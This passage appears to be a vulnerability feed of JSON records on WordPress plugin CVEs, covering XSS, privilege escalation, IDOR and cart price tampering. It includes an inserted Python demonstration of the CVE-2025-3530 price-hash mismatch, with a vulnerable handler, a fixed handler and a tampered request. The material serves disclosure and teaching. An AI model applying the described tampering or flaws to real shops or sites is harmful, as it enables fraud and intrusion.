{"CVE_ID":"CVE-2024-0618","slug":"fluentform","versionEndExcluding":"5.1.7","description":"The Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0348d465-f351-4c52-b293-8b3b058292b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0348d465-f351-4c52-b293-8b3b058292b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022938\\\/fluentform\\\/tags\\\/5.1.7\\\/app\\\/Helpers\\\/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022938\\\/fluentform\\\/tags\\\/5.1.7\\\/app\\\/Helpers\\\/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0618\\\/\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0618\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2568","slug":"gallery-photo-gallery","versionEndExcluding":"5.1.7","description":"The Photo Gallery by Ays WordPress plugin before 5.1.7 does not escape some parameters before outputting it back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1704a12-459b-4f5d-aa2d-a96646ddaf3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1704a12-459b-4f5d-aa2d-a96646ddaf3e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0701","slug":"userpro","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator.","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13557","slug":"ut-shortcodes","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The Shortcodes by United Themes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.1.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/unitedthemes.com\\\/\",\"name\":\"https:\\\/\\\/unitedthemes.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4ca7dad-bfe2-443e-b575-362d8ff93242?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4ca7dad-bfe2-443e-b575-362d8ff93242?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2439","slug":"userpro","versionImpact":"5.1.5","versionEndExcluding":"5.1.6","description":"The UserPro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userpro' shortcode in versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21cb424c-4efd-4c12-a08a-6d574f118c28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6009","slug":"userpro","versionImpact":"5.1.4","versionEndExcluding":"5.1.5","description":"The UserPro plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.4 due to insufficient restriction on the 'userpro_update_user_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.","recommendation":"Update to version 5.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8bed9c0-dae3-405e-a946-5f28a3c30851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8bed9c0-dae3-405e-a946-5f28a3c30851?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0157","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.5","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8248b550-6485-4108-a701-8446ffa35f06\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8248b550-6485-4108-a701-8446ffa35f06\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0156","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.5","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caf1dbb5-197e-41e9-8f48-ba1f2360a759\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/caf1dbb5-197e-41e9-8f48-ba1f2360a759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3890","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_cart_button' shortcode in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-wp-shopping-cart-installation-usage-290#step-1-inserting-an-add-to-cart-button\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-wp-shopping-cart-installation-usage-290#step-1-inserting-an-add-to-cart-button\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93898bf8-cfed-44bf-9d68-a0167beba86a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93898bf8-cfed-44bf-9d68-a0167beba86a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3889","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.3 via the 'process_payment_data' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to change the quantity of a product to a negative number, which subtracts the product cost from the total order cost. The attack will only work with Manual Checkout mode, as PayPal and Stripe will not process payments for a negative quantity.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L324\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L324\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-shopping-cart-enabling-manual-offline-checkout\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/simple-shopping-cart-enabling-manual-offline-checkout\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41212533-535e-4a9e-a9b8-1240021a3752?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41212533-535e-4a9e-a9b8-1240021a3752?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3874","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.3 due to lack of randomization of a user controlled key. This makes it possible for unauthenticated attackers to access customer shopping carts and edit product links, add or delete products, and discover coupon codes.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/developer.wordpress.org\\\/reference\\\/functions\\\/wp_generate_password\\\/\",\"name\":\"https:\\\/\\\/developer.wordpress.org\\\/reference\\\/functions\\\/wp_generate_password\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/class-wpsc-cart.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284572\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-shopping-cart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fed59bf-885b-4a06-aff2-8e5ab5f83ba7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fed59bf-885b-4a06-aff2-8e5ab5f83ba7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6557","slug":"wp-scheduled-posts","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The SchedulePress \u2013 Auto Post & Publish, Auto Social Share, Schedule Posts with Editorial Calendar & Missed Schedule Post Publisher plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 5.1.3. This is due the plugin utilizing the wpdeveloper library and leaving the demo files in place with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80fa8b3-f345-4b3f-8a16-ee9f19b07a0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f80fa8b3-f345-4b3f-8a16-ee9f19b07a0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scheduled-posts\\\/trunk\\\/vendor\\\/wpdevelopers\\\/pinterest-api-php\\\/demo\\\/boot.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scheduled-posts\\\/trunk\\\/vendor\\\/wpdevelopers\\\/pinterest-api-php\\\/demo\\\/boot.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117736%40wp-scheduled-posts&new=3117736%40wp-scheduled-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117736%40wp-scheduled-posts&new=3117736%40wp-scheduled-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1073","slug":"wp-slimstat","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cba63c-4629-48fd-850f-f68dad626a67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33cba63c-4629-48fd-850f-f68dad626a67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/trunk\\\/admin\\\/index.php#L1004\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/trunk\\\/admin\\\/index.php#L1004\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4386","slug":"meow-gallery","versionImpact":"5.1.3","versionEndExcluding":"5.1.4","description":"The Gallery Block (Meow Gallery) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data_atts\u2019 parameter in versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477b41a5-b2ff-4b94-9622-824146a0e2ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/477b41a5-b2ff-4b94-9622-824146a0e2ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meow-gallery\\\/trunk\\\/classes\\\/core.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meow-gallery\\\/trunk\\\/classes\\\/core.php#L273\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082976\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082976\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13505","slug":"survey-maker","versionImpact":"5.1.3.3","versionEndExcluding":"5.1.3.4","description":"The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ays_sections[5][questions][8][title]\u2019 parameter in all versions up to, and including, 5.1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/survey-maker\\\/tags\\\/5.1.3.2\\\/admin\\\/partials\\\/surveys\\\/actions\\\/partials\\\/survey-maker-surveys-actions-tab1.php#L1160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/survey-maker\\\/tags\\\/5.1.3.2\\\/admin\\\/partials\\\/surveys\\\/actions\\\/partials\\\/survey-maker-surveys-actions-tab1.php#L1160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3c22a2-b766-419c-a481-48e6a73b084c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3c22a2-b766-419c-a481-48e6a73b084c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4346","slug":"all-in-one-wp-security-and-firewall","versionEndExcluding":"5.1.3","description":"The All-In-One Security (AIOS) WordPress plugin before 5.1.3 leaked settings of the plugin publicly, including the used email address.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc05f760-983d-4dc1-afbb-6b4965aa8abe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc05f760-983d-4dc1-afbb-6b4965aa8abe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3530","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.2","versionEndExcluding":"5.1.3","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to product price manipulation in all versions up to, and including, 5.1.2. This is due to a logic flaw involving the inconsistent use of parameters during the cart addition process. The plugin uses the parameter 'product_tmp_two' for computing a security hash against price tampering while using 'wspsc_product' to display the product, allowing an unauthenticated attacker to substitute details from a cheaper product and bypass payment for a more expensive item.","recommendation":"Update to version 5.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/wp_shopping_cart.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/wordpress-simple-paypal-shopping-cart-plugin-768\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/wordpress-simple-paypal-shopping-cart-plugin-768\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a3910b-adc4-4633-a6a1-32ba50894be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a3910b-adc4-4633-a6a1-32ba50894be4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
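The parameter mismatch behind CVE-2025-3530 above, as an added example written for this page (Python, not the plugin's own PHP and not taken from the referenced changeset). The two field names `wspsc_product` and `product_tmp_two` come from the record; the `price` and `hash` fields, the HMAC secret, the catalogue and the request layout are assumptions made for illustration. The point it demonstrates is general: an anti-tampering tag only protects the fields it is both computed over and checked against, so whatever field the cart ends up trusting must be the one the tag covers.

```python
import hashlib
import hmac

# Constructed stand-in for a site secret; the plugin's real hashing scheme is not shown on this page.
SITE_SECRET = b"constructed-site-secret"

# Constructed catalogue: what the shop actually charges for each product.
CATALOGUE = {"Ebook": "1.00", "Premium Course": "499.00"}


def price_hash(product: str, price: str) -> str:
    """Anti-tampering tag the shop embeds in its own add-to-cart form."""
    return hmac.new(SITE_SECRET, f"{product}|{price}".encode(), hashlib.sha256).hexdigest()


def render_form(product: str) -> dict:
    """The add-to-cart form the shop serves for a legitimate product (field layout assumed)."""
    price = CATALOGUE[product]
    return {"wspsc_product": product, "product_tmp_two": product,
            "price": price, "hash": price_hash(product, price)}


def add_to_cart_vulnerable(req: dict):
    """Mirrors the flaw: the tag is verified against product_tmp_two,
    but the cart line is built from wspsc_product."""
    expected = price_hash(req["product_tmp_two"], req["price"])
    if not hmac.compare_digest(expected, req["hash"]):
        return None
    return {"name": req["wspsc_product"], "price": req["price"]}


def add_to_cart_fixed(req: dict):
    """One field feeds both the tag check and the cart line,
    and the price is re-read server-side rather than trusted from the request."""
    product = req["wspsc_product"]
    if product not in CATALOGUE:
        return None
    expected = price_hash(product, req["price"])
    if not hmac.compare_digest(expected, req["hash"]):
        return None
    # Even after a valid tag, the catalogue is authoritative for the amount charged.
    return {"name": product, "price": CATALOGUE[product]}


def tampered_request() -> dict:
    """Attacker flow: take the shop's own form for the cheap item and swap only the displayed product."""
    req = render_form("Ebook")  # carries a valid tag for ("Ebook", "1.00")
    req["wspsc_product"] = "Premium Course"
    return req


def demo() -> dict:
    """Run the same tampered request through both handlers, plus a legitimate one through the fix."""
    req = tampered_request()
    return {
        "vulnerable": add_to_cart_vulnerable(req),
        "fixed": add_to_cart_fixed(req),
        "legit": add_to_cart_fixed(render_form("Premium Course")),
    }


if __name__ == "__main__":
    print(demo())
```

With a server-side price lookup the tag becomes defence in depth; the essential correction is that the field the cart trusts and the field the tag is checked against are the same one.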
{"CVE_ID":"CVE-2024-9528","slug":"fluentform","versionImpact":"5.1.19","versionEndExcluding":"5.1.20","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form label fields in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to edit forms (administrator by default), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1.20, or a newer patched 